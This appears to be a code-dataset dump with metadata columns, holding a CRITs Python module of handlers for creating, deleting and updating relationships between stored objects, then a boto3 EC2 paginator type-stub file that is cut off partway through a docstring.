hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dcf63677b003deaf4111b24fab378a43fe257043
| 22,281
|
py
|
Python
|
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
import datetime
from dateutil.parser import parse
from crits.core.class_mapper import class_from_id
def get_relationships(obj=None, type_=None, id_=None, analyst=None):
    """
    Get relationships for a top-level object.

    :param obj: The top-level object to get relationships for.
    :type obj: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param type_: The top-level object type to get relationships for.
    :type type_: str
    :param id_: The ObjectId of the top-level object.
    :type id_: str
    :param analyst: The user requesting the relationships.
    :type analyst: str
    :returns: dict
    """
    # Resolve the object from type/id only when it was not passed directly.
    if not obj and type_ and id_:
        obj = class_from_id(type_, id_)
    if not obj:
        # No object and no resolvable type/id pair: nothing to report.
        return {}
    # Single exit point for both lookup paths (previously duplicated).
    return obj.sort_relationships("%s" % analyst, meta=True)
def get_relationship_types(active=True):
    """
    Get relationship types available in the database.

    :param active: Only get active relationship types.
    :type active: bool
    :returns: list
    """
    from crits.core.crits_mongoengine import RelationshipType

    # Fetch either only the active relationship types or all of them.
    if active:
        records = RelationshipType.objects(active="on")
    else:
        records = RelationshipType.objects()

    names = []
    for record in records:
        # Always include the forward name; include the reverse name
        # only when it differs, to avoid listing duplicates.
        names.append(record.forward)
        if record.reverse != record.forward:
            names.append(record.reverse)
    names.sort()
    return names
def forge_relationship(left_class=None, right_class=None,
                       left_type=None, left_id=None,
                       right_type=None, right_id=None,
                       rel_type=None, rel_date=None,
                       analyst=None, rel_reason="N/A",
                       rel_confidence='unknown', get_rels=False):
    """
    Forge a relationship between two top-level objects.

    :param left_class: The first top-level object to relate to.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object to relate to.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object to relate to.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object to relate to.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param analyst: The user forging this relationship.
    :type analyst: str
    :param rel_reason: The reason for the relationship.
    :type rel_reason: str
    :param rel_confidence: The confidence of the relationship.
    :type rel_confidence: str
    :param get_rels: Return the relationships after forging.
    :type get_rels: boolean
    :returns: dict with keys "success" (boolean) and "message" (str if
              failed, dict if successful)
    """
    # Normalize rel_date: accept None, the literal string 'None', a parseable
    # date string, or a datetime instance; anything else becomes None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None
    if not left_class:
        if left_type and left_id:
            left_class = class_from_id(left_type, left_id)
            if not left_class:
                return {'success': False,
                        'message': "Unable to get object."}
        else:
            return {'success': False,
                    'message': "Need a valid left type and id"}
    try:
        # forge relationship
        if right_class:
            results = left_class.add_relationship(rel_item=right_class,
                                                  rel_type=rel_type,
                                                  rel_date=rel_date,
                                                  analyst=analyst,
                                                  rel_confidence=rel_confidence,
                                                  rel_reason=rel_reason)
            right_class.save(username=analyst)
        else:
            if right_type and right_id:
                results = left_class.add_relationship(type_=right_type,
                                                      rel_id=right_id,
                                                      rel_type=rel_type,
                                                      rel_date=rel_date,
                                                      analyst=analyst,
                                                      rel_confidence=rel_confidence,
                                                      rel_reason=rel_reason)
            else:
                return {'success': False,
                        'message': "Need a valid right type and id"}
    # Fixed: "except Exception, e" is Python-2-only syntax; the "as" form
    # is valid on Python 2.6+ and Python 3.
    except Exception as e:
        return {'success': False, 'message': e}
    if results['success']:
        left_class.save(username=analyst)
        left_class.reload()
        if get_rels:
            results['relationships'] = left_class.sort_relationships("%s" % analyst, meta=True)
    return results
def delete_all_relationships(left_class=None, left_type=None,
                             left_id=None, analyst=None):
    """
    Delete all relationships for this top-level object.

    :param left_class: The top-level object to delete relationships for.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of the top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the top-level object.
    :type left_id: str
    :param analyst: The user deleting these relationships.
    :type analyst: str
    :returns: dict with keys "success" (boolean) and "message" (str)
    """
    # Resolve the object from its type/id pair when not provided directly.
    if not left_class:
        if not (left_type and left_id):
            return {'success': False,
                    'message': "Need a valid left type and id"}
        left_class = class_from_id(left_type, left_id)
        if not left_class:
            return {'success': False,
                    'message': "Unable to get object."}
    return left_class.delete_all_relationships()
def delete_relationship(left_class=None, right_class=None,
                        left_type=None, left_id=None,
                        right_type=None, right_id=None,
                        rel_type=None, rel_date=None,
                        analyst=None, get_rels=True):
    """
    Delete a relationship between two top-level objects.

    :param left_class: The first top-level object.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param analyst: The user deleting this relationship.
    :type analyst: str
    :param get_rels: Return the relationships after deleting.
    :type get_rels: boolean
    :returns: dict with keys "success" (boolean) and "message" (str if
              failed, dict if successful)
    """
    # Coerce rel_date into either a datetime or None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None

    # Resolve the left-hand object if only its type/id was supplied.
    if not left_class:
        if not (left_type and left_id):
            return {'success': False,
                    'message': "Need a valid left type and id"}
        left_class = class_from_id(left_type, left_id)
        if not left_class:
            return {'success': False,
                    'message': "Unable to get object."}

    # delete relationship
    if right_class:
        results = left_class.delete_relationship(rel_item=right_class,
                                                 rel_type=rel_type,
                                                 rel_date=rel_date,
                                                 analyst=analyst)
        right_class.save(username=analyst)
    elif right_type and right_id:
        results = left_class.delete_relationship(type_=right_type,
                                                 rel_id=right_id,
                                                 rel_type=rel_type,
                                                 rel_date=rel_date,
                                                 analyst=analyst)
    else:
        return {'success': False,
                'message': "Need a valid right type and id"}

    if results['success']:
        left_class.save(username=analyst)
        if get_rels:
            results['relationships'] = left_class.sort_relationships("%s" % analyst, meta=True)
    return results
def update_relationship_types(left_class=None, right_class=None,
                              left_type=None, left_id=None,
                              right_type=None, right_id=None,
                              rel_type=None, rel_date=None,
                              new_type=None, analyst=None):
    """
    Update the relationship type between two top-level objects.

    :param left_class: The first top-level object.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param new_type: The new type of relationship.
    :type new_type: str
    :param analyst: The user updating this relationship.
    :type analyst: str
    :returns: dict with keys "success" (boolean) and "message" (str)
    """
    # Coerce rel_date into either a datetime or None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None

    # Resolve the left-hand object if only its type/id was supplied.
    if not left_class:
        if not (left_type and left_id):
            return {'success': False,
                    'message': "Need a valid left type and id"}
        left_class = class_from_id(left_type, left_id)
        if not left_class:
            return {'success': False,
                    'message': "Unable to get object."}

    # update relationship
    if right_class:
        results = left_class.edit_relationship_type(rel_item=right_class,
                                                    rel_type=rel_type,
                                                    rel_date=rel_date,
                                                    new_type=new_type,
                                                    analyst=analyst)
        left_class.save(username=analyst)
        right_class.save(username=analyst)
    elif right_type and right_id:
        results = left_class.edit_relationship_type(type_=right_type,
                                                    rel_id=right_id,
                                                    rel_type=rel_type,
                                                    rel_date=rel_date,
                                                    new_type=new_type,
                                                    analyst=analyst)
        left_class.save(username=analyst)
    else:
        return {'success': False,
                'message': "Need a valid right type and id"}
    return results
def update_relationship_confidences(left_class=None, right_class=None,
                                    left_type=None, left_id=None,
                                    right_type=None, right_id=None,
                                    rel_type=None, rel_date=None,
                                    new_type=None, analyst=None,
                                    new_confidence='unknown'):
    """
    Update the relationship confidence between two top-level objects.

    :param left_class: The first top-level object.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param new_type: Unused; retained for signature compatibility with callers.
    :type new_type: str
    :param analyst: The user updating this relationship.
    :type analyst: str
    :param new_confidence: The new confidence level.
    :type new_confidence: str
    :returns: dict with keys "success" (boolean) and "message" (str)
    """
    # Normalize rel_date: accept None, the literal string 'None', a parseable
    # date string, or a datetime instance; anything else becomes None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None
    if not left_class:
        if left_type and left_id:
            left_class = class_from_id(left_type, left_id)
            # Fixed: class_from_id can return None; without this guard the
            # calls below would raise AttributeError. Matches the sibling
            # handlers (forge_relationship, delete_relationship, ...).
            if not left_class:
                return {'success': False,
                        'message': "Unable to get object."}
        else:
            return {'success': False,
                    'message': "Need a valid left type and id"}
    # update relationship
    if right_class:
        results = left_class.edit_relationship_confidence(rel_item=right_class,
                                                          rel_type=rel_type,
                                                          rel_date=rel_date,
                                                          new_confidence=new_confidence,
                                                          analyst=analyst)
        left_class.save(username=analyst)
        right_class.save(username=analyst)
    else:
        if right_type and right_id:
            results = left_class.edit_relationship_confidence(type_=right_type,
                                                              rel_id=right_id,
                                                              rel_type=rel_type,
                                                              rel_date=rel_date,
                                                              new_confidence=new_confidence,
                                                              analyst=analyst)
            left_class.save(username=analyst)
        else:
            return {'success': False,
                    'message': "Need a valid right type and id"}
    return results
def update_relationship_reasons(left_class=None, right_class=None,
                                left_type=None, left_id=None,
                                right_type=None, right_id=None,
                                rel_type=None, rel_date=None,
                                new_type=None, analyst=None, new_reason="N/A"):
    """
    Update the relationship reason between two top-level objects.

    :param left_class: The first top-level object.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param new_type: Unused; retained for signature compatibility with callers.
    :type new_type: str
    :param analyst: The user updating this relationship.
    :type analyst: str
    :param new_reason: The new reason for the relationship.
    :type new_reason: str
    :returns: dict with keys "success" (boolean) and "message" (str)
    """
    # Normalize rel_date: accept None, the literal string 'None', a parseable
    # date string, or a datetime instance; anything else becomes None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None
    if not left_class:
        if left_type and left_id:
            left_class = class_from_id(left_type, left_id)
            # Fixed: class_from_id can return None; without this guard the
            # calls below would raise AttributeError. Matches the sibling
            # handlers (forge_relationship, delete_relationship, ...).
            if not left_class:
                return {'success': False,
                        'message': "Unable to get object."}
        else:
            return {'success': False,
                    'message': "Need a valid left type and id"}
    # update relationship
    if right_class:
        results = left_class.edit_relationship_reason(rel_item=right_class,
                                                      rel_type=rel_type,
                                                      rel_date=rel_date,
                                                      new_reason=new_reason,
                                                      analyst=analyst)
        left_class.save(username=analyst)
        right_class.save(username=analyst)
    else:
        if right_type and right_id:
            results = left_class.edit_relationship_reason(type_=right_type,
                                                          rel_id=right_id,
                                                          rel_type=rel_type,
                                                          rel_date=rel_date,
                                                          new_reason=new_reason,
                                                          analyst=analyst)
            left_class.save(username=analyst)
        else:
            return {'success': False,
                    'message': "Need a valid right type and id"}
    return results
def update_relationship_dates(left_class=None, right_class=None,
                              left_type=None, left_id=None,
                              right_type=None, right_id=None,
                              rel_type=None, rel_date=None,
                              new_date=None, analyst=None):
    """
    Update the relationship date between two top-level objects.

    :param left_class: The first top-level object.
    :type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param right_class: The second top-level object.
    :type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
    :param left_type: The type of first top-level object.
    :type left_type: str
    :param left_id: The ObjectId of the first top-level object.
    :type left_id: str
    :param right_type: The type of second top-level object.
    :type right_type: str
    :param right_id: The ObjectId of the second top-level object.
    :type right_id: str
    :param rel_type: The type of relationship.
    :type rel_type: str
    :param rel_date: The date this relationship applies.
    :type rel_date: datetime.datetime
    :param new_date: The new date of the relationship.
    :type new_date: str
    :param analyst: The user updating this relationship.
    :type analyst: str
    :returns: dict with keys "success" (boolean) and "message" (str)
    """
    # Coerce both date arguments into either a datetime or None.
    if rel_date is None or rel_date == 'None':
        rel_date = None
    elif isinstance(rel_date, basestring) and rel_date != '':
        rel_date = parse(rel_date, fuzzy=True)
    elif not isinstance(rel_date, datetime.datetime):
        rel_date = None
    if new_date is None or new_date == 'None':
        new_date = None
    elif isinstance(new_date, basestring) and new_date != '':
        new_date = parse(new_date, fuzzy=True)
    elif not isinstance(new_date, datetime.datetime):
        new_date = None

    # Resolve the left-hand object if only its type/id was supplied.
    if not left_class:
        if not (left_type and left_id):
            return {'success': False,
                    'message': "Need a valid left type and id"}
        left_class = class_from_id(left_type, left_id)
        if not left_class:
            return {'success': False,
                    'message': "Unable to get object."}

    # update relationship
    if right_class:
        results = left_class.edit_relationship_date(rel_item=right_class,
                                                    rel_type=rel_type,
                                                    rel_date=rel_date,
                                                    new_date=new_date,
                                                    analyst=analyst)
        left_class.save(username=analyst)
        right_class.save(username=analyst)
    elif right_type and right_id:
        results = left_class.edit_relationship_date(type_=right_type,
                                                    rel_id=right_id,
                                                    rel_type=rel_type,
                                                    rel_date=rel_date,
                                                    new_date=new_date,
                                                    analyst=analyst)
        left_class.save(username=analyst)
    else:
        return {'success': False,
                'message': "Need a valid right type and id"}
    return results
| 42.278937
| 95
| 0.572865
| 2,592
| 22,281
| 4.716821
| 0.045525
| 0.054965
| 0.050384
| 0.053002
| 0.889007
| 0.874121
| 0.852037
| 0.832979
| 0.81523
| 0.807541
| 0
| 0
| 0.35344
| 22,281
| 526
| 96
| 42.359316
| 0.848674
| 0.005296
| 0
| 0.810811
| 0
| 0
| 0.059706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013514
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b4b6dd092135c289630c3d796f50721caba20dfd
| 652,967
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from datetime import datetime
from typing import List
from botocore.paginate import Paginator
class DescribeByoipCidrs(Paginator):
    """Stub paginator for ``EC2.Client.describe_byoip_cidrs``."""

    def paginate(self, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates responses from
        :py:meth:`EC2.Client.describe_byoip_cidrs`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeByoipCidrs>`_

        Each response page is a dict with a ``ByoipCidrs`` key: a list of
        dicts, each carrying ``Cidr`` (the public IPv4 address range in CIDR
        notation), ``Description``, ``StatusMessage`` (pool ID on success,
        otherwise an error message), and ``State`` (one of ``advertised``,
        ``deprovisioned``, ``failed-deprovision``, ``failed-provision``,
        ``pending-deprovision``, ``pending-provision``, ``provisioned``).

        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for
            the action without making the request; the error response is
            ``DryRunOperation`` if permitted, else ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (total
            items to return; a ``NextToken`` is provided when more remain),
            ``PageSize`` (items per page), and ``StartingToken`` (the
            ``NextToken`` from a previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeCapacityReservations(Paginator):
    """Stub paginator for ``EC2.Client.describe_capacity_reservations``."""

    def paginate(self, CapacityReservationIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates responses from
        :py:meth:`EC2.Client.describe_capacity_reservations`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeCapacityReservations>`_

        Each response page is a dict with a ``CapacityReservations`` key: a
        list of dicts describing Capacity Reservations, with fields including
        ``CapacityReservationId``, ``InstanceType``, ``InstancePlatform``
        (operating system, e.g. ``Linux/UNIX`` or one of the Windows/SQL
        Server variants), ``AvailabilityZone``, ``Tenancy`` (``default`` for
        shared hardware, ``dedicated`` for single-tenant hardware),
        ``TotalInstanceCount``, ``AvailableInstanceCount`` (remaining
        launchable capacity), ``EbsOptimized``, ``EphemeralStorage``,
        ``State`` (``active``, ``expired``, ``cancelled``, ``pending``, or
        ``failed``; failed requests are retained for 60 minutes),
        ``EndDate`` (when the reservation expires and its capacity is
        released), ``EndDateType`` (``unlimited`` or ``limited``),
        ``InstanceMatchCriteria`` (``open`` accepts any matching instance;
        ``targeted`` requires the instance to explicitly target the
        reservation), ``CreateDate``, and ``Tags`` (list of ``Key``/``Value``
        pairs; keys max 127 Unicode characters and may not begin with
        ``aws:``, values max 255).

        :type CapacityReservationIds: list
        :param CapacityReservationIds: IDs of the Capacity Reservations, as
            a list of strings.
        :type Filters: list
        :param Filters: One or more filters, each a dict with ``Name``
            (case-sensitive filter name) and ``Values`` (case-sensitive
            filter values). Supported filters are documented with the
            describe operation (e.g. DescribeAvailabilityZones,
            DescribeImages, DescribeInstances, DescribeKeyPairs,
            DescribeSecurityGroups, DescribeSnapshots, DescribeSubnets,
            DescribeTags, DescribeVolumes, DescribeVpcs).
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for
            the action without making the request; the error response is
            ``DryRunOperation`` if permitted, else ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: Pagination controls: ``MaxItems`` (total
            items to return; a ``NextToken`` is provided when more remain),
            ``PageSize`` (items per page), and ``StartingToken`` (the
            ``NextToken`` from a previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeClassicLinkInstances(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, Filters: List = None, DryRun: bool = None, InstanceIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_classic_link_instances`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClassicLinkInstances>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              InstanceIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'Instances': [
                    {
                        'Groups': [
                            {
                                'GroupName': 'string',
                                'GroupId': 'string'
                            },
                        ],
                        'InstanceId': 'string',
                        'Tags': [
                            {
                                'Key': 'string',
                                'Value': 'string'
                            },
                        ],
                        'VpcId': 'string'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **Instances** *(list) --*
            Information about one or more linked EC2-Classic instances.
            - *(dict) --*
              Describes a linked EC2-Classic instance.
              - **Groups** *(list) --*
                A list of security groups.
                - *(dict) --*
                  Describes a security group.
                  - **GroupName** *(string) --*
                    The name of the security group.
                  - **GroupId** *(string) --*
                    The ID of the security group.
              - **InstanceId** *(string) --*
                The ID of the instance.
              - **Tags** *(list) --*
                Any tags assigned to the instance.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
              - **VpcId** *(string) --*
                The ID of the VPC.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``group-id`` - The ID of a VPC security group that\'s associated with the instance.
          * ``instance-id`` - The ID of the instance.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          * ``vpc-id`` - The ID of the VPC to which the instance is linked.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type InstanceIds: list
        :param InstanceIds:
          One or more instance IDs. Must be instances linked to a VPC through ClassicLink.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
